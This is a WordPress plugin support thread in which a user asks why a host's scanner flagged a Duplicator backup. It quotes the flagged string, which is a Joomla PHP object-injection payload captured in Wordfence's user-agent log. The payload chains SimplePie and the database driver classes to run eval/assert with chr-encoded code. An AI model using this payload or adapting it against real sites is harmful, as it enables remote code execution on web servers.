Hey @philrp,
Can you provide more details as to why WordFence thought the code to be malicious? If you have sensitive info to share just submit a ticket and refer to this thread.
Thanks
Thread Starter
philrp
(@philrp)
Hi,
Thank you for your response.
My hosting provider runs some form of malicious code scan on a regular basis.
The code they identified as malicious is the following, taken from the UA column of the wfHits table of Wordfence.
}__test|O:21:”JDatabaseDriverMysqli”:3:{s:2:”fc”;O:17:”JSimplepieFactory”:0:{}s:21:”\0\0\0disconnectHandlers”;a:1:{i:0;a:2:{i:0;O:9:”SimplePie”:5:{s:8:”sanitize”;O:20:”JDatabaseDriverMysql”:0:{}s:8:”feed_url”;s:119:”eval(chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr(40).chr(41).chr(59));Factory::getConfig();exit”;s:19:”cache_name_function”;s:6:”assert”;s:5:”cache”;b:1;s:11:”cache_class”;O:20:”JDatabaseDriverMysql”:0:{}}i:1;s:4:”init”;}}s:13:”\0\0\0connection”;b:1;}????
According to the Wordfence person in their forum, wfHits stores referrers, user-agents and other data that any site visitor or attacker can modify.
My first thought was to tell Duplicator to exclude the wfHits table, but wouldn’t that break Wordfence on restore or clone?
According to my hosting company, the SQL file within the ZIP file would not raise an issue, hence my question about possibly preventing (or removing) the separate SQL file?
Thanks for such a great tool and support.
Phil
Hey Phil,
That section of code doesn’t look to be problematic to me in its current context. Sometimes scanners can have false flags. There is an overview of it in this FAQ.
– A scanner says that a security issue/malware/threat was detected. Is this valid?
– https://snapcreek.com/duplicator/docs/faqs-tech/#faq-trouble-070-q
Hope this helps~
